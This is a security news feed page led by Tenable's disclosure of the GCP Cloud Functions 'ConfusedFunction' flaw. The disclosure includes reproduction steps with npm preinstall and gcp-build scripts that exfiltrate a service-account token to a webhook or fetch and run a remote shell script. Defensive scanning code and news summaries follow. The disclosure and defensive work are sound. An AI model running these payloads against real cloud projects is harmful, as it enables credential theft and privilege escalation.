After Tenable reported the vulnerability, GCP confirmed it and partially remediated ConfusedFunction for Cloud Build accounts created after mid-June 2024. The remediation did not address existing Cloud Build instances. ConfusedFunction highlights the problematic scenarios that arise from software complexity and inter-service communication within a cloud provider's services. Specifically, to preserve backward compatibility, GCP has not changed the privileges of Cloud Build service accounts created before the fix was implemented. This means the vulnerability still affects existing instances.

It is also worth noting that while the GCP fix reduced the severity of the problem for future deployments, it did not eliminate it: deploying a Cloud Function still triggers the creation of the GCP services listed above, so users must still grant the Cloud Build service account permissions that are minimal but still relatively broad. If you use Cloud Functions, we highly recommend monitoring for and preventing this scenario, since attackers can still use it as a tactic, technique and procedure (TTP).

We want to thank Google Cloud for its cooperation and quick response.

How to remediate this vulnerability

For every Cloud Function that uses the legacy Cloud Build service account, replace it with a least-privilege service account. More details on how Tenable can help are at the end of this blog.

What are Cloud Functions?

Cloud Functions in GCP are event-triggered, serverless functions. They scale automatically and execute code in response to specific events such as HTTP requests or data changes. The first generation offered basic event handling, while the second generation improved language options, runtime customization and overall flexibility for more complex applications.

ConfusedFunction vulnerability details

When a new Cloud Function is created or an existing one is updated, GCP initiates a deployment process behind the scenes. The vulnerability affects both first- and second-generation Cloud Functions; we describe the first-generation deployment process because it is simpler than the second-generation one, which involves additional GCP services.

After the deployment is triggered, a service agent saves the Cloud Function's source code to a Cloud Storage bucket, and a Cloud Build instance orchestrates the function's deployment. It does so by building the Cloud Function code into a container image and pushing the image to a Container Registry or an Artifact Registry.

But how does this Cloud Build instance perform privileged actions within your Google Cloud project?

Tenable Research noticed that the Cloud Build instance GCP creates for the function deployment has the default Cloud Build service account attached to it, and that service account carries some interesting permissions. The attachment happens behind the scenes, just as the deployment initiation does; the only way a user can change the service account of the Cloud Build deployment instance is to edit it after it has already been created.

An important note: as you would expect, the only permissions a user needs to create or update a Cloud Function are function permissions, but the Cloud Build instance, Cloud Storage bucket and Artifact Registry image in the user's account, all of which GCP creates for orchestration, require additional privileges. GCP creates these background services through service agents and the default Cloud Build service account.
In terms of identity and access management (IAM), a user who has access to Cloud Functions should not have IAM permissions on the services involved in the function's orchestration.

While inspecting the Cloud Build instance created when Tenable Research deployed a function, we looked for a sink (a potentially dangerous endpoint where injected malicious data can lead to adverse effects such as code execution) controlled by user input or another controllable source, one that would let code run in the Cloud Build instance and escalate privileges from Cloud Function permissions to those of the default Cloud Build service account.

In the Cloud Build logs for our Node.js function we found an "npm install" command. Cloud Build installs the function's dependencies, which we control with nothing more than function permissions. That looks like a perfect candidate for privilege escalation.

We can now create a new Cloud Function or edit an existing one, add our "malicious" dependency to the function's dependencies file and let the deployment do its job. Here is a package.json example for a Node.js function:

{
  "dependencies": {
    "@google-cloud/functions-framework": "^3.0.0",
    "mypocmaliciouspackage": "^1.0.0"
  }
}

The deployment starts, and the Cloud Build instance for our function runs its build commands, including the "npm install" that installs our malicious dependency. The same process applies to, and affects, all Cloud Functions runtime environments.

Our goal was to run code on the Cloud Build instance. A preinstall script in the malicious dependency does exactly that, because npm runs it during installation. Here is our malicious dependency:

{
  "name": "mypocmaliciouspackage",
  "version": "1.0.0",
  "description": "poc",
  "main": "index.js",
  "scripts": {
    "test": "echo 'testa'",
    "preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/134567893333@cloudbuild.gserviceaccount.com/token');curl -X POST -d $access_token https://tenable-webhook.com"
  },
  "author": "me",
  "license": "ISC"
}

The preinstall script reads the default Cloud Build service account's token, which GCP attached automatically, from the Cloud Build instance's metadata server and posts it to an attacker-controlled webhook. With this token we can impersonate the default Cloud Build service account and escalate from Cloud Function permissions to the service account's permissions.

Full attack reproduction

Steps to reproduce this technique, using a Node.js function runtime as the example:

1. Run npm init. A package is created in your current folder. Change its package.json to the following:

{
  "name": "mypocmaliciouspackage",
  "version": "1.0.0",
  "description": "poc",
  "main": "index.js",
  "scripts": {
    "test": "echo 'testa'",
    "preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/134567893333@cloudbuild.gserviceaccount.com/token');curl -X POST -d $access_token https://webhook.com"
  },
  "author": "me",
  "license": "ISC"
}

2. Run npm publish. (This publishes the package to the public npm registry, which is where Cloud Build will fetch it from. An unscoped name such as this one is public by default; a scoped name needs --access public.)

3. Create a new Cloud Function or update an existing one, using an identity that has only function permissions.

4. Pick a Node.js runtime and edit the function's package.json to depend on your malicious package:

{
  "dependencies": {
    "@google-cloud/functions-framework": "^3.0.0",
    "mypocmaliciouspackage": "^1.0.0"
  }
}

5. Deploy the Cloud Function. Cloud Build runs, your malicious package is installed, and its preinstall script exfiltrates the default Cloud Build service account's GCP token from the instance metadata to your webhook.

The aftermath: more ways for exploitation

Later in the research we found more ways to leak the default Cloud Build service account token during the function deployment. One of them is the npm build script that runs at the start of the build. As part of the build process, the Cloud Build instance runs build scripts, and those scripts are controlled through the Cloud Function's source code, the same problematic pattern as ConfusedFunction. An identity with permission to create or update a function can therefore run code in the Cloud Build build step by placing malicious code in that build script. From there, exploitation is the same: the attacker injects the malicious build script into the function's package.json or requirements.txt (depending on the runtime environment of the Cloud Function), the code runs inside Cloud Build, reads the instance metadata and exfiltrates the default Cloud Build service account's token.

Steps to reproduce with the Node.js runtime: host your malicious script or reverse shell as shell.sh, change the package.json to the following and deploy the function:

{
  "dependencies": {
    "@google-cloud/functions-framework": "^3.0.0"
  },
  "scripts": {
    "gcp-build": "curl -s http://attackerserver/shell.sh | bash"
  }
}

The vulnerability fix and extra steps taken by GCP to enhance overall security

In response to the disclosure of these vulnerabilities, GCP deployed changes to improve the security of Cloud Functions and of Cloud Build service accounts in general.
In mid-June, GCP added an option in Cloud Functions to use a custom service account for the Cloud Build instance that is deployed as part of the function deployment. This service account should be tailored to the specific requirements of the function's deployment, which makes this form of deployment more secure. Before the fix, customers had no visibility into or control over the default Cloud Build service account, since it was attached automatically to the Cloud Build instance during deployment. More details about the fix can be found in the updated GCP documentation.

Extra steps taken by Google Cloud

As an additional response to the ConfusedFunction finding, Google Cloud rolled out another update to Cloud Build over May and June 2024 that changed the default behavior of Cloud Build and of the default Cloud Build service account. In late June, new organization policies were released that give organizations full control over which service account Cloud Build uses by default.

For projects that enable the Cloud Build API after the May and June 2024 release, the changes are:

- Existing Cloud Build service accounts are now referred to as legacy Cloud Build service accounts.
- Projects use the Compute Engine service account by default for directly submitted builds.
- Projects must explicitly specify a service account when creating a new trigger.

Projects that enabled the Cloud Build API before the changes were introduced keep the previous behavior by default. Organizations can adjust the organization policies to control which service account Cloud Build uses by default. More information on the new organization policies and updates is available in Google Cloud's documentation.

By adopting these fixes, you can systematically improve the security posture of your Google Cloud environment.

Conclusion

Cloud providers build their popular customer-facing offerings on top of their core services, so one click in the console can create many resources in your account in the background that you may not be aware of. In ConfusedFunction, this design pattern was the root cause of the vulnerability. Software complexity and inter-service communication make modern applications hard to protect; as more services take part in a process, vulnerabilities and misconfigurations become more likely.

These vulnerabilities, and common misconfigurations based on the same concepts, also confuse customers about where they sit in the shared responsibility model. Even though the resources were created by the cloud provider, their security is the customer's responsibility, because they live in the customer's account.

In this post we showed a technique for abusing the permissions of the Cloud Function deployment to elevate privileges. By sharing our process, we hope to educate the security community about the complexity of Cloud Function internals and the many nuances of IAM risk.

How can Tenable Cloud Security help?

The Tenable Cloud Security team will launch a feature in August 2024 to help customers eliminate the risks described in this post. It will alert customers to excessive IAM permissions and to use of the default Cloud Build service account, taking into account the use and risks of Cloud Functions. Due to the complexity of cloud infrastructure, IAM misconfigurations are inevitable and, as this post shows, can pose a huge risk. The Tenable Cloud Security CNAPP solution helps by identifying exactly which resources an identity can access or, conversely, how a resource is exposed, including risks such as privilege escalation, and by automatically generating least-privilege policies that remove the risky permissions.

Tenable Research is here to help

Feel free to contact Tenable Research with any questions or concerns about cloud security.

by Tenable
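The sink in both variants described above is the function's own dependency manifest: npm runs preinstall/install/postinstall hooks during the npm install step, and the buildpack runs the gcp-build script, all inside Cloud Build under whatever service account is attached. The pre-deploy gate below is an added example, not Tenable's or Google's code: it rejects a function source whose package.json carries install-time scripts or dependencies outside an allowlist, or whose requirements.txt references code outside the package index. The allowlist, the file-to-contents mapping and the two sample manifests are constructed for the example.

```python
"""Pre-deploy gate for Cloud Function source manifests (added example; not Tenable's or Google's code)."""
import json
import re

# npm lifecycle hooks that run during `npm install` inside the Cloud Build step the post
# abuses, plus `gcp-build`, the script the Google buildpack runs during function deployment.
INSTALL_TIME_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "gcp-build"}

# Constructed allowlist for the example; in practice this comes from your dependency policy.
ALLOWED_NPM_PACKAGES = {"@google-cloud/functions-framework", "express"}

# npm version specs that fetch from somewhere other than the registry.
NON_REGISTRY_SPEC = re.compile(r"^(git\+|git:|https?://|file:|github:)", re.IGNORECASE)

# requirements.txt lines that pull code from outside the package index (editable installs,
# VCS URLs, HTTP URLs, local paths). Such packages run arbitrary setup code at build time.
DIRECT_REFERENCE = re.compile(r"^(-e\s|git\+|https?://|file:|\.\.?/|/)", re.IGNORECASE)


def check_package_json(text: str) -> list[str]:
    """Flag install-time scripts and unvetted or non-registry dependencies."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"package.json: unparseable ({exc.msg})"]
    findings = []
    scripts = manifest.get("scripts", {})
    for name in sorted(set(scripts) & INSTALL_TIME_SCRIPTS):
        findings.append(f"package.json: install-time script '{name}' would run in Cloud Build: {scripts[name]!r}")
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if name not in ALLOWED_NPM_PACKAGES:
                findings.append(f"package.json: {section} '{name}@{spec}' is not on the allowlist")
            elif NON_REGISTRY_SPEC.match(str(spec)):
                findings.append(f"package.json: '{name}' resolves outside the registry: {spec}")
    return findings


def check_requirements(text: str) -> list[str]:
    """Flag requirements.txt entries that install code from outside the index."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments, including VCS '#egg=' fragments
        if line and DIRECT_REFERENCE.match(line):
            findings.append(f"requirements.txt:{lineno}: direct reference fetches build-time code: {line}")
    return findings


def gate_function_source(files: dict[str, str]) -> list[str]:
    """files maps manifest name -> contents. An empty result means the deploy may proceed."""
    findings = []
    if "package.json" in files:
        findings += check_package_json(files["package.json"])
    if "requirements.txt" in files:
        findings += check_requirements(files["requirements.txt"])
    return findings


# Constructed manifests for the example: the first mirrors the post's gcp-build and dependency
# tricks, the second is a clean function.
SAMPLE_MALICIOUS = json.dumps({
    "dependencies": {"@google-cloud/functions-framework": "^3.0.0", "mypocmaliciouspackage": "^1.0.0"},
    "scripts": {"gcp-build": "curl -s http://attackerserver/shell.sh | bash"},
})
SAMPLE_CLEAN = json.dumps({"dependencies": {"@google-cloud/functions-framework": "^3.0.0"}})

if __name__ == "__main__":
    for label, manifest in (("malicious", SAMPLE_MALICIOUS), ("clean", SAMPLE_CLEAN)):
        print(label, gate_function_source({"package.json": manifest}) or ["ok"])
```

Run it against the function source before deployment (for example as a CI step ahead of gcloud functions deploy). It is a compensating control only: the fix the post recommends, a dedicated least-privilege build service account, is what removes the privileges there are to escalate to, while a gate like this just reduces the chance that attacker-controlled build code runs in the first place.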

2024-07-24 07:20:23

Kematian Stealer Technical Analysis

In the ever-evolving world of cybersecurity, new threats emerge constantly, challenging our defenses and requiring continuous vigilance. One such threat that has recently come to light is the “Kematian Stealer,” an advanced information-stealing malware. ThreatMon’s Kematian Stealer Technical Analysis Report aims to provide an in-depth analysis of this potent malware, its features, and the mitigation […] The post Kematian Stealer Technical Analysis appeared first on ThreatMon Blog.

by ThreatMon

2024-07-24 06:40:19

Windows July security updates send PCs into BitLocker recovery

Microsoft warned that some Windows devices will boot into BitLocker recovery after installing the July 2024 Windows security updates. [...]

by BleepingComputer

2024-07-24 02:15:26

Exploiting Broken Authentication Control In GraphQL

Overview The implementation of GraphQL in enterprise systems has grown rapidly. A recent report from Gartner predicted that at least 50% of enterprises will be implementing GraphQL in their production environments by the end of the calendar year. With its increasing adoption, correctly accounting for the security of GraphQL APIs becomes increasingly pertinent.  Although the […] The post Exploiting Broken Authentication Control In GraphQL appeared first on Praetorian.

by Praetorian

2024-07-24 00:29:59

Recursive Amplification Attacks: Botnet-as-a-Service

Introduction On a recent client engagement, we tested a startup’s up-and-coming SaaS data platform and discovered an alarming attack path. The specific feature names and technologies have been generalized to anonymize the platform. Like many data platforms, various source types could be configured to ingest data, such as third-party CRM or marketing services. The platform […] The post Recursive Amplification Attacks: Botnet-as-a-Service appeared first on Praetorian.

by Praetorian

2024-07-24 00:00:00

BreachForums v1 database leak is an OPSEC test for hackers

The entire database for the notorious BreachForums v1 hacking forum was released on Telegram Tuesday night, exposing a treasure trove of data, including members' information, private messages, cryptocurrency addresses, and every post on the forum. [...]

by BleepingComputer

2024-07-23 21:54:33

Biggest trial court in the US closed after ransomware attack

The Los Angeles County Superior Court remained closed on Monday as it tried to recover from a ransomware attack.

by ThreatDown

2024-07-23 21:47:45

FrostyGoop ICS malware targets Ukraine

In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems (ICS) using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered and that a nation-state […]

by Security Affairs

2024-07-23 20:30:44

Impact of Microsoft Copilot+ Recall on corporate cybersecurity

How to prepare IT systems and employees for the arrival of visual AI assistants from Microsoft, Google, and Apple.

by Kaspersky

2024-07-23 20:29:26

Russia Adjusts Cyber Strategy for the Long Haul in War With Ukraine

Russia has cast aside its focus on civilian infrastructures and is instead targeting Ukraine's military operations in myriad ways.

by Dark Reading

2024-07-23 19:41:51

Phish-Friendly Domain Registry “.top” Put on Notice

The Chinese company in charge of handing out domain names ending in “.top” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. The warning comes amid the release of new findings that .top was the most common suffix in phishing websites over the past year, second only to domains ending in “.com.”

by Krebs on Security

2024-07-23 19:39:56

China's 'Evasive Panda' APT Spies on Taiwan Targets Across Platforms

The cohort's variety of individual tools covers just about any operating system it could possibly wish to attack.

by Dark Reading

2024-07-23 19:33:36

Chinese hackers deploy new Macma macOS backdoor version

The Chinese hacking group tracked as 'Evasive Panda' was spotted using new versions of the Macma backdoor and the Nightdoor Windows malware. [...]

by BleepingComputer

2024-07-23 19:16:12

Goodbye? Attackers Can Bypass 'Windows Hello' Strong Authentication

Accenture researcher undercut WHfB's default authentication using the open source Evilginx adversary-in-the-middle (AitM) reverse-proxy attack framework.

by Dark Reading

2024-07-23 19:09:07

Sophos Firewall v20 MR2 is now available

Sophos Firewall OS v20 MR2 is a free upgrade for all licensed Sophos Firewall customers.

by Sophos News

2024-07-23 18:41:55

Hamster Kombat’s 250 million players targeted in malware attacks

Threat actors are taking advantage of the massive popularity of the Hamster Kombat game, targeting players with fake Android and Windows software that install spyware and information-stealing malware. [...]

by BleepingComputer

2024-07-23 18:40:49

CrowdStrike global outage: Sophos guidance

Our take on what happened and answers to key questions from Sophos customers and partners.

by Sophos News

2024-07-23 18:23:48

Sprawling CrowdStrike Incident Mitigation Showcases Resilience Gaps

A painful recovery from arguably one of the worst IT outages ever continues, and the focus is shifting to what can be done to prevent something similar from happening again.

by Dark Reading

2024-07-23 18:11:24

Custom Inbox Enhancements: Revolutionizing Vulnerability Management for Enterprises

By Morgan Pearson, Tue, 07/23/2024 - 11:11

Introducing Custom Inboxes

Custom Inboxes provide our enterprise customers with unparalleled flexibility in report management. Organizational administrators can now create, remove, and edit up to 300 custom inboxes, structured in collections that align with their team, business unit, or asset organization. This segmentation allows for a more tailored approach to managing and processing reports.

Key Features

Report Allocation: Assign reports to specific teams, business units, and assets.

API Report Routing: Automate the routing of engagement reports to custom inboxes using our Inbox API.

Create / Remove / Edit Custom Inboxes: Up to 300 custom inboxes can be managed by organizational administrators.

Streamline Report Management with Custom Inboxes

Enhanced Report Management: Customers can now manage reports in collections that match their organizational structure. Each team, business unit, or asset can have a dedicated inbox, ensuring that reports are handled by the appropriate users. For example, an operational team responsible for validating vulnerabilities can access relevant reports without the ability to suggest or make reward payments, while a central business unit managing multiple subsidiaries can view all reports in a single inbox.

Improved Efficiency and Reduced Risk: By segmenting reports and managing access more effectively, customers can streamline their report management workflows and reduce the risk of vulnerability details being exposed to users who do not need them. Custom inboxes ensure that only authorized users and user groups have access to specific reports, improving both security and efficiency.

Automated Report Routing: With the Inbox API, customers can automate the routing of engagement reports to their chosen custom inboxes. This reduces manual tasks and ensures that reports are quickly and accurately directed to the appropriate teams or business units.

3 Game-Changing Custom Inbox Enhancements

We are excited to share additional capabilities that enhance the Custom Inbox experience further:

Notifications: Customers will receive alerts when a vulnerability report is assigned to a custom inbox, ensuring timely attention and action.

Analytics: Customers will soon be able to view data and statistics for vulnerability reports per custom inbox, providing insight into report management and performance.

Automation: Automation capabilities help customers reduce repetitive tasks across the vulnerability lifecycle within the HackerOne platform. This includes allocating reports to predefined custom inboxes based on the report or inbox criteria of your choice.

We're committed to continuously improving our platform to meet our customers' needs. The Custom Inbox Enhancements benefit enterprise customers by providing a more efficient, secure, and flexible way to manage vulnerability reports. Stay tuned for more updates and features coming your way! For any questions or feedback about the new Custom Inbox Enhancements, please reach out to the HackerOne support team. We're here to help you get the most out of this new feature.

Excerpt: HackerOne's Custom Inbox Enhancements provide flexible report segmentation, reduce administrative overhead, and mitigate security risks.

by HackerOne

2024-07-23 17:58:00

Chinese Hackers Target Taiwan and U.S. NGO with MgBot and MACMA Malware

Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in China have been targeted by a Beijing-affiliated state-sponsored hacking group called Daggerfly using an upgraded set of malware tools. The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on

by The Hacker News

2024-07-23 17:55:11

Phishing Campaigns Abuse Cloud Platforms to Target Latin America

Several threat actors are abusing legitimate cloud services to launch phishing attacks against users in Latin America, according to Google’s latest Threat Horizons Report.

by KnowBe4

2024-07-23 17:55:08

Is Your Bank Really Calling? How to Protect Yourself from Financial Impersonation Fraud

Protecting your financial information has never been more crucial. With the rise of sophisticated scams, it's becoming increasingly difficult to distinguish between legitimate bank communications and fraudulent attempts to access your accounts. So, how can you be sure it's really your bank contacting you?

by KnowBe4

2024-07-23 17:55:04

Crypto Data Breach Continues to Fuel Phishing Scams Years Later

According to security researchers at Cisco Talos, emails impersonating legitimate officers at the Cyprus Securities and Exchange Commission are being sent to prior Opteck customers, offering victims investment advice.

by KnowBe4

2024-07-23 17:48:32

Windows 10 KB5040525 fixes WDAC issues causing app failures, memory leak

Microsoft has released the July 2024 preview update for Windows 10, version 22H2, with fixes for Windows Defender Application Control (WDAC) issues causing app crashes and system memory exhaustion. [...]

by BleepingComputer

2024-07-23 17:32:56

10 essential steps for transitioning from VPN to Zero Trust Access

Migrate to Zero Trust Access with confidence. Barracuda’s network security experts have you covered with this essential starter kit.

by Barracuda

2024-07-23 17:28:44

Play Ransomware Variant Targeting Linux ESXi Environments

Play Ransomware Targets Linux! New Variant Attacks ESXi with Prolific Puma Ties. Learn how to protect your organization…

by Hackread

2024-07-23 17:28:22

Hackers abused swap files in e-skimming attacks on Magento sites

Threat actors abused swap files in compromised Magento websites to hide a credit card skimmer and harvest payment information. Security researchers from Sucuri observed threat actors using swap files in compromised Magento websites to conceal a persistent software skimmer and harvest payment information. The attackers used this tactic to maintain persistence, allowing the malware to […]

by Security Affairs

2024-07-23 16:57:14

Adventures in Shellcode Obfuscation! Part 6: Two Array Method

by Mike Saunders, Principal Security Consultant. This blog is the sixth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of […]

by Red Siege Blog

2024-07-23 16:24:00

New ICS Malware 'FrostyGoop' Targeting Critical Infrastructure

Cybersecurity researchers have discovered what they say is the ninth Industrial Control Systems (ICS)-focused malware that has been used in a disruptive cyber attack targeting an energy company in the Ukrainian city of Lviv earlier this January. Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP

by The Hacker News

2024-07-23 16:21:16

Attackers Exploit 'EvilVideo' Telegram Zero-Day to Hide Malware

An exploit sold on an underground forum requires user action to download an unspecified malicious payload.

by Dark Reading

2024-07-23 16:16:00

Tenable’s Software Update Process Protects Customers’ Business Continuity with a Safe, Do-No-Harm Design

With the unprecedented tech outages experienced by so many of our customers over the last week, we recognize the need for a deeper understanding of our software development processes and how they support global business continuity. In this blog post, we outline how Tenable's approach to the software development lifecycle (SDLC) lets us produce high-quality software and protect our customers' business operations with a secure, do-no-harm design.

Tenable manages every step in the SDLC (research, design, development, testing and release), which results in software that is stable, tested, accurate and timely. Specifically, Tenable makes software-design choices that prioritize flexibility and give customers control over the deployment of our software releases and updates. For example, customers can control when, or whether, the Nessus Agent and its plugins are updated within their environment. Additionally, the Nessus Agent runs in user space rather than in the kernel, reducing the risk of operating-system faults. Features such as these put the ultimate power in the hands of customer change-control programs and lower the risk of incidents such as the one that caused the global IT outage last week. Below we provide more details.

Declarative plugin version control feature

Supporting our customers' change-control management processes, Tenable provides the flexibility to choose from multiple options for how the plugin content version is applied across agent deployments. This gives customers the control to validate and test Tenable plugins before performing an enterprise deployment.

Do-no-harm Nessus Agent design

The Tenable Nessus Agent is designed to execute solely in user space and to limit its interaction with the endpoint's kernel to the standard system calls provided by the operating system, such as event notification callbacks. As such, the Nessus Agent does not require any Tenable-developed components to reside inside the operating system kernel. This design is intentional, to reduce catastrophic impacts to the endpoint's operating system; it also prevents the Nessus Agent from impacting an endpoint's ability to boot properly. User-space applications do not have direct access to the kernel or hardware, so a fault in the agent cannot by itself cause the kind of kernel failure that produces a "blue screen of death" on a Windows system.

Nessus Agent software version control features

Enabling our customers' enterprise change-control procedures is a priority for Tenable. With Tenable Vulnerability Management, and with Nessus Manager for Security Center integrations, we provide multiple options for customers to apply software version control to their Nessus agents. These options allow customers to test and validate the Nessus Agent before performing an enterprise deployment. Depending on their business needs, customers may choose to use this feature.

We hope this blog post has given you a clear idea of how Tenable strives to design and deliver software with the highest degree of security and quality, guided by our top priority: keeping our customers safe and protecting their businesses. Please contact us if you wish to get more information about our software development processes.

by Tenable

2024-07-23 16:08:01

DeFi exchange dYdX v3 website hacked in DNS hijack attack

Decentralized finance (DeFi) crypto exchange dYdX announced on Tuesday that the website for its older v3 trading platform has been compromised. [...]

by BleepingComputer

2024-07-23 15:43:00

How to Securely Onboard New Employees Without Sharing Temporary Passwords

The initial onboarding stage is a crucial step for both employees and employers. However, this process often involves the practice of sharing temporary first-day passwords, which can expose organizations to security risks. Traditionally, IT departments have been cornered into either sharing passwords in plain text via email or SMS, or arranging in-person meetings to verbally communicate these

by The Hacker News

2024-07-23 15:42:00

Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files

Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information. The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said. The skimmer is designed to capture all the data entered into the credit card form on the

by The Hacker News
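The two Magento items above (Security Affairs and The Hacker News, both reporting Sucuri's finding) describe skimmers hidden in swap files so that they survive cleanup of the "real" checkout files. A practical response is to treat any swap- or backup-named file in a production web root as something to review, and to read its contents for the combination of card-form field access, decoding and exfiltration that checkout skimmers need. The script below is an added example, not code from Sucuri or either outlet; the suffix list, the indicator patterns, the threshold of two indicator categories and the sample web root (built in a temp directory) are all assumptions made for illustration.

```python
# Added example (not code from Sucuri or The Hacker News): hunt for swap- and
# backup-named files in a web root and check their contents for checkout-skimmer
# indicators. Suffixes, patterns and the demo tree are assumptions for illustration.
import os
import re
import tempfile

# Suffixes editors and deploy tools leave behind; attackers park payloads under
# similar names because cleanup scripts and scanners often skip them (assumed list).
SWAP_SUFFIXES = (".swp", ".swo", ".swn", ".swap", "~", ".bak", ".orig")

# Indicator categories: card-form field names, decoding helpers and exfiltration
# primitives that checkout skimmers commonly combine (assumed patterns).
INDICATORS = {
    "card_field": re.compile(r"cc_?number|card_?number|cardnumber", re.I),
    "cvv_or_expiry": re.compile(r"\bcvv\b|\bcvc\b|expir", re.I),
    "decoder": re.compile(r"\batob\(|base64_decode\(|fromCharCode\(", re.I),
    "exfil": re.compile(r"XMLHttpRequest|\bfetch\(|sendBeacon\(", re.I),
}


def is_swap_name(name: str) -> bool:
    """True if the file name carries a swap/backup suffix worth reviewing."""
    return any(name.endswith(s) for s in SWAP_SUFFIXES)


def scan_webroot(root: str, min_hits: int = 2) -> list[dict]:
    """List every swap-named file under root; flag those whose contents match
    at least min_hits distinct indicator categories. Results sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_swap_name(name):
                continue
            path = os.path.join(dirpath, name)
            text = ""
            try:
                with open(path, "rb") as fh:
                    # read at most 512 KiB; skimmers are small and this bounds the cost
                    text = fh.read(512 * 1024).decode("utf-8", errors="ignore")
            except OSError:
                pass  # unreadable: still report the name, with no content hits
            hits = sorted(k for k, pat in INDICATORS.items() if pat.search(text))
            findings.append({
                "path": os.path.relpath(path, root),
                "hits": hits,
                "suspicious": len(hits) >= min_hits,
            })
    return sorted(findings, key=lambda f: f["path"])


def build_demo_webroot() -> str:
    """Construct a throwaway Magento-like tree: one benign editor swap file and
    one swap-named file carrying skimmer-like JavaScript (both constructed)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "app", "code"))
    os.makedirs(os.path.join(root, "pub", "static"))
    files = {
        # live checkout file; not swap-named, so never reported
        os.path.join("app", "code", "Checkout.php"): "<?php\nclass Checkout {}\n",
        # harmless leftover from an editor session: listed, but no indicator hits
        os.path.join("app", "code", "Checkout.php.swp"): "<?php\nclass Checkout { /* wip */ }\n",
        # swap-named file whose body is a skimmer (constructed and inert: the
        # base64 string decodes to https://example.invalid/)
        os.path.join("pub", "static", "checkout.js.swap"): (
            "(function(){var n=document.querySelector('[name=cc_number]').value;"
            "var v=document.querySelector('[name=cvv]').value;"
            "fetch(atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv'),"
            "{method:'POST',body:btoa(n+'|'+v)});})();"
        ),
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    demo = build_demo_webroot()
    for f in scan_webroot(demo):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{flag:10} {f['path']}  hits={f['hits']}")
```

Every swap-named file is reported, not only the flagged ones: an editor swap file under a production web root should not exist at all, and a payload that has been obfuscated beyond these patterns will only show up in that first list. Run it against a real document root with `scan_webroot("/var/www/html")` and pair it with file-integrity monitoring so the next cleanup catches the hidden copy as well as the live one.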

2024-07-23 15:15:55

Meta Llama 3.1 now available on Workers AI

Cloudflare is excited to be a launch partner with Meta to introduce Workers AI support for Llama 3.1

by Cloudflare

2024-07-23 15:12:31

Want to Gain Control of Your Cloud Costs? Give Engineering More Ownership

As cloud spending surges, organizations face challenges in cost management and visibility. Here's why you should give engineers ownership over cloud expenses.

by ITPro Today

2024-07-23 15:07:00

Meta Given Deadline to Address E.U. Concerns Over 'Pay or Consent' Model

Meta has been given until September 1, 2024, to respond to concerns raised by the European Commission over its "pay or consent" advertising model or risk facing enforcement measures, including sanctions. The European Commission said the Consumer Protection Cooperation (CPC) Network has notified the social media giant that the model adopted for Facebook and Instagram might potentially violate

by The Hacker News

2024-07-23 15:03:56

Google admits it can’t quite quit third-party cookies

Google has taken a new turn in its approach to eliminating third-party cookies. This time it's back to the Privacy Sandbox.

by Malwarebytes Labs

2024-07-23 14:46:57

How to choose an MDR vendor: 6 questions to ask

by ThreatDown

2024-07-23 14:33:00

Ukrainian Institutions Targeted Using HATVIBE and CHERRYSPY Malware

The Computer Emergency Response Team of Ukraine (CERT-UA) has alerted of a spear-phishing campaign that targeted a scientific research institution in the country with malware known as HATVIBE and CHERRYSPY. The agency attributed the attack to a threat actor it tracks under the name UAC-0063, which was previously observed targeting various government entities to gather sensitive information using

by The Hacker News

2024-07-23 14:14:55

How a North Korean Fake IT Worker Tried to Infiltrate Us

Incident Report Summary: Insider Threat. First of all: No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems. This is not a data breach notification, there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don't let it happen to you. Story updated 7/24/2024. TLDR: KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware. Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application. Additionally, a background check and all other standard pre-hiring checks were performed and came back clear due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The picture was AI "enhanced". The EDR software detected it and alerted our InfoSec Security Operations Center. The SOC called the new hire and asked if they could help. That's when it got dodgy fast. We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea. The picture you see is an AI fake that started out with stock photography (below). The detail in the following summary is limited because this is an active FBI investigation.

by KnowBe4

2024-07-23 14:04:00

CrowdStrike CEO’s quick apology stands out in an industry rife with deflection

The cybersecurity vendor’s swift and contrite response helped the company convey confidence and control over the mess it created, experts say.

by Cybersecurity Dive

2024-07-23 14:00:00

Wanted: An SBOM Standard to Rule Them All

A unified standard is essential for realizing the full potential of SBOMs in enhancing software supply chain security.

by Dark Reading

2024-07-23 14:00:00

Introducing Layered Analysis for Enhanced Container Security

